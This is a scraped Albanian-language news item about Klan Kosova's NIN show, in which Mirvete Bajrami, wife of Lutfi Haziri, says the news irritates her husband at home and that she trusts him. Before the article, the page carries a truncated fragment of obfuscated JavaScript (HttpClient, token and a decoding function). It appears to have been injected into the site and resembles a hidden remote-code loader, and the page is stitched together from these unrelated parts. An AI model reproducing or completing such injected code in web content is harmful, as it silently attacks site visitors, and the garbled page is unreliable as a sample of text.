;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Mirvetja tregon se çka e nervozon Lutën në shtëpi

By

Sonte në emisionin NIN të Klan Kosova në pjesën e parë po diskutohet se si është të jesh partner i politikanëve.

Të ftuar për të folur rreth kësaj teme janë bashkëshortja e Besnik Tahirit, bashkëshorti i deputetës nga rradhët e LDK-së, Prindon Sadriu, e gruaja e Lutfi Hazirit, zonja Mirvete Bajrami.

Kjo e fundit tregoi në NIN se edhe prindërit e saj e kanë këshilluar që të ketë kujdes meqenëse të jesh gruaja e një politikani është më e vështirë.

Kur u pyet se çka e nervozon Lutën në shtëpi, ajo tha se atë e nervozojnë lajmet. ‘Unë i përcjelli lajmet, por në momentin kur hyn Luta në shtëpi nuk ka lajme, vetëm këngë ose eventualisht ndonjë film’ – u shpreh zonja Mirvete.

Ajo tha se bashkëshortit të saj i beson shumë pasi është konsistent në atë që thotë dhe nuk i ndryshon fjalët që i thotë duke e cilësuar atë një politikan të lindur. /Prive.al/

Artikuj të ngjashëm